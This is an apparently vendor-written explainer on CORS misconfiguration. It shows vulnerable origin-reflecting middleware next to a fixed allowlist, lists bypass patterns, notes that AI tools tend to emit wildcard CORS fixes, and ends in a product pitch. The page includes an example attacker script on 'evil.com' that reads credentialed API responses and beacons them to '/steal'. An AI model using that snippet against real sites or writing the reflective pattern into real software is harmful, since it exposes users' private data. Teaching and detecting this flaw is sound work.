What is CORS Misconfiguration? Cross-Origin Resource Sharing Explained

Cross-Origin Resource Sharing (CORS Misconfiguration)

CORS Misconfiguration is a security flaw where an application improperly configures Cross-Origin Resource Sharing headers, allowing unauthorized websites to make authenticated requests to your API and read the responses. It is classified under CWE-942 (Permissive Cross-domain Policy with Untrusted Domains). A misconfigured CORS policy effectively disables the browser's same-origin policy — the primary defense keeping one site from reading data on another.

What is CORS Misconfiguration?

Browsers enforce a rule called the same-origin policy: code on evil.com can't read responses from yourapp.com. CORS is the mechanism that relaxes this rule when you want to. The problem starts when you relax it too much.

If your API returns Access-Control-Allow-Origin: * alongside Access-Control-Allow-Credentials: true, or if it reflects whatever Origin header the browser sends, any website on the internet can make authenticated requests to your API and read the response. Your users visit a malicious page, and their data is silently exfiltrated.

This isn't a theoretical attack. It's trivial to exploit — a few lines of JavaScript on an attacker-controlled page is all it takes. The user doesn't click anything special. They just visit a page while logged into your app.

How does CORS Misconfiguration work?

The attack works because browsers send cookies automatically with cross-origin requests. If your API tells the browser "sure, any origin can read my responses," the attacker's page gets full access to your authenticated endpoints.

Here's what a misconfigured CORS setup looks like in a typical API:

Vulnerable — reflects any origin with credentials

// middleware.ts or API route
res.setHeader(
  'Access-Control-Allow-Origin',
  req.headers.origin // reflects any origin
);
res.setHeader(
  'Access-Control-Allow-Credentials',
  'true'
);

// Attacker's page (evil.com):
fetch('https://yourapp.com/api/me', {
  credentials: 'include',
})
  .then(r => r.json())
  .then(data => {
    // stolen: user profile, tokens, private data
    navigator.sendBeacon('/steal', JSON.stringify(data));
  });

Fixed — explicit origin allowlist

// middleware.ts
const ALLOWED_ORIGINS = [
  'https://yourapp.com',
  'https://app.yourapp.com',
];

const origin = req.headers.origin;

if (ALLOWED_ORIGINS.includes(origin)) {
  res.setHeader('Access-Control-Allow-Origin', origin);
  res.setHeader(
    'Access-Control-Allow-Credentials',
    'true'
  );
}
// If origin isn't in the list, no CORS headers
// are sent — browser blocks the response.

Why do AI tools generate CORS Misconfiguration vulnerabilities?

When you ask an AI to fix a CORS error, it optimizes for making the error go away. The fastest path is the wildcard — and that's exactly what it generates.

CORS errors are frustrating. Developers hit CORS blocks during development and ask the AI to "fix CORS." The model reaches for the broadest possible fix: allow everything.
Wildcard examples dominate training data. Stack Overflow is full of answers that say "just set Access-Control-Allow-Origin to *." The model learned from those shortcuts.
Dev and prod need different configs. In development, you might legitimately need loose CORS (localhost on different ports). AI doesn't distinguish between dev and production settings.

The result is APIs that ship to production wide open. The browser same-origin policy — one of the most important security boundaries on the web — gets disabled by a single header.

Common CORS Misconfiguration patterns

Wildcard with credentials

Access-Control-Allow-Origin: * combined with Access-Control-Allow-Credentials: true. Browsers actually block this combo, but some frameworks work around it by reflecting the origin instead.

Origin reflection

Copying the request Origin header into the response. Looks targeted but actually allows every domain.

Null origin allowed

Allowing Origin: null — which can be triggered from sandboxed iframes and local file:// pages.

Regex bypass in allowlist

Using a regex like /yourapp\.com/ that also matches evil-yourapp.com or yourapp.com.evil.com.

How Flowpatrol detects CORS Misconfiguration

Flowpatrol sends crafted cross-origin requests to your app and checks exactly how it responds — the same way an attacker would probe your CORS policy:

1Sends requests with varying Origin headers — including attacker-controlled domains, null, and subdomains of your app.
2Checks for origin reflection — if the response mirrors whatever origin was sent, your policy is wide open.
3Tests credential handling — verifies whether Access-Control-Allow-Credentials is enabled alongside permissive origins.
4Reports exploitability — flags the exact endpoints affected, the misconfigured headers, and what an attacker could steal.

CORS misconfigurations are invisible to your users and easy to miss in code review. Flowpatrol catches them in seconds.

Check your CORS policy.

Flowpatrol tests your API with real cross-origin requests. Paste your URL and find out if your data is exposed.

Try it free

Cross-Origin Resource Sharing (CORS Misconfiguration)

What is CORS Misconfiguration?

How does CORS Misconfiguration work?

Here's what a misconfigured CORS setup looks like in a typical API:

Vulnerable — reflects any origin with credentials

// middleware.ts or API route
res.setHeader(
  'Access-Control-Allow-Origin',
  req.headers.origin // reflects any origin
);
res.setHeader(
  'Access-Control-Allow-Credentials',
  'true'
);

// Attacker's page (evil.com):
fetch('https://yourapp.com/api/me', {
  credentials: 'include',
})
  .then(r => r.json())
  .then(data => {
    // stolen: user profile, tokens, private data
    navigator.sendBeacon('/steal', JSON.stringify(data));
  });

Fixed — explicit origin allowlist

// middleware.ts
const ALLOWED_ORIGINS = [
  'https://yourapp.com',
  'https://app.yourapp.com',
];

const origin = req.headers.origin;

if (ALLOWED_ORIGINS.includes(origin)) {
  res.setHeader('Access-Control-Allow-Origin', origin);
  res.setHeader(
    'Access-Control-Allow-Credentials',
    'true'
  );
}
// If origin isn't in the list, no CORS headers
// are sent — browser blocks the response.

Why do AI tools generate CORS Misconfiguration vulnerabilities?

When you ask an AI to fix a CORS error, it optimizes for making the error go away. The fastest path is the wildcard — and that's exactly what it generates.

CORS errors are frustrating. Developers hit CORS blocks during development and ask the AI to "fix CORS." The model reaches for the broadest possible fix: allow everything.
Wildcard examples dominate training data. Stack Overflow is full of answers that say "just set Access-Control-Allow-Origin to *." The model learned from those shortcuts.
Dev and prod need different configs. In development, you might legitimately need loose CORS (localhost on different ports). AI doesn't distinguish between dev and production settings.

The result is APIs that ship to production wide open. The browser same-origin policy — one of the most important security boundaries on the web — gets disabled by a single header.

Common CORS Misconfiguration patterns

Wildcard with credentials

Access-Control-Allow-Origin: * combined with Access-Control-Allow-Credentials: true. Browsers actually block this combo, but some frameworks work around it by reflecting the origin instead.

Origin reflection

Copying the request Origin header into the response. Looks targeted but actually allows every domain.

Null origin allowed

Allowing Origin: null — which can be triggered from sandboxed iframes and local file:// pages.

Regex bypass in allowlist

Using a regex like /yourapp\.com/ that also matches evil-yourapp.com or yourapp.com.evil.com.

How Flowpatrol detects CORS Misconfiguration

Flowpatrol sends crafted cross-origin requests to your app and checks exactly how it responds — the same way an attacker would probe your CORS policy:

1Sends requests with varying Origin headers — including attacker-controlled domains, null, and subdomains of your app.
2Checks for origin reflection — if the response mirrors whatever origin was sent, your policy is wide open.
3Tests credential handling — verifies whether Access-Control-Allow-Credentials is enabled alongside permissive origins.
4Reports exploitability — flags the exact endpoints affected, the misconfigured headers, and what an attacker could steal.

CORS misconfigurations are invisible to your users and easy to miss in code review. Flowpatrol catches them in seconds.

Cross-Origin Resource Sharing (CORS Misconfiguration)